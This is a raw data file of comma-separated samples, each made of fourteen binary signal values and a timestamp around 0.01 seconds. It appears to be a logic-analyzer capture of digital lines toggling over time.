1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8993960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8994200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8994440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8994720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8994960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8995240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8995480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8995720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8995960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8996200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8996440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8996720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8996960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8997240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8997480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8997720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8997960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8998200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8998440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8998720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8998960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8999240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8999480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8999720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8999960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9000200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9000440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9000720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9000960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9001240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9001480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9001720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9001960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9002200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9002440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9002720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9002960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9003240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9003480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9003720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9003960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9004200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9004440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9004720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9004960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.9005240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.9005480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.0024980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0025180e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025196e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,1.0025220e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025248e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0025540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025564e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0025572e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,1.0025612e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0025636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025644e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0025664e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025688e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0025740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0025764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0025792e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0025812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0025820e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0025860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0025888e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0025892e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0025896e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0025916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0025940e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0025944e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0025988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026212e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0026216e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026220e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026288e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0026292e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026296e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026312e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026340e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026388e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026412e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026436e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026468e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026612e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0026616e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026620e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026660e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026688e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0026692e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026696e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026712e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026740e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026812e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026888e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0026912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0026940e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0026964e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0026968e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0026988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027012e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027068e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027100e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027112e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027140e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027164e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027188e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027244e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027288e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027312e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027340e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027364e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027396e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027540e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0027564e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027568e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027612e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027644e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027688e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027712e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027792e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027844e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0027860e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0027888e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027892e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027940e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0027968e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0027988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028140e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0028164e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028168e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0028212e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028244e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028288e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028292e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0028340e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028512e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028516e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0028564e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028596e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028636e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028688e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028740e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028748e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0028788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028816e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028888e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0028912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0028940e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0028964e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0028968e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0028988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0029012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029040e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029360e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029536e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029560e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029760e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029936e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0029964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0029988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030292e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030336e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030360e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030688e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030840e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030892e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0030964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0030988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031044e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031064e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031288e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031688e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031888e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0031964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0031988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0032284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0032308e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0156884e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157100e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,1.0157116e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157144e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0157432e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0157460e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.0157500e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,1,1.0157532e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157536e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0157556e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157580e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,1,1.0157584e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0157588e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.0157628e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0157656e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,1,1.0157660e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.0157680e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.0157700e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.0157708e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0157716e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0157756e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0157780e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0157788e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0157804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0157828e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0157832e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0157884e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0157908e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0157912e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0157916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0157932e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0157956e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0157980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158056e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158080e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158108e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0158156e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158180e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158188e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158228e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.0158232e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158236e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0158280e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158308e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.0158312e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158332e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158356e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158380e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158404e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158428e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.0158452e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.0158480e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158508e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.0158556e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.0158580e-02 